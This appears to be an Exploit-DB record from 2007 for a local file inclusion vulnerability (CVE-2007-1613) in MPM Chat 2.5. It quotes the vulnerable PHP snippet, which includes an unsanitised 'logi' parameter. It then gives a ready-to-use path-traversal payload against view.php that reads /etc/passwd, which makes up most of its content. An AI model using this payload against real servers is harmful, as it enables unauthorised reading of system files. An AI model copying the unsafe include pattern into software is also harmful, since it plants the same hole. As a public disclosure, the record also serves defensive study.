MPM Chat 2.5 view.php logi Local File Include Vulnerability

2007-03-17T00:00:00
ID EDB-ID:3503
Type exploitdb
Reporter GoLd_M
Modified 2007-03-17T00:00:00

Description

MPM Chat 2.5 (view.php logi) Local File Include Vulnerability. CVE-2007-1613. Webapps exploit for php platform

                                        
                                            # MPM Chat 2.5 (view.php logi) Local File Include Exploit
# D.Script: http://mpm.pahviloota.net/mpm_chat_25.zip
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code
<?php
if ($logi != '') {
include 'archive/' . $logi;
#Exploit: /[path]/view.php?logi=../../../../../etc/passwd

# milw0rm.com [2007-03-17]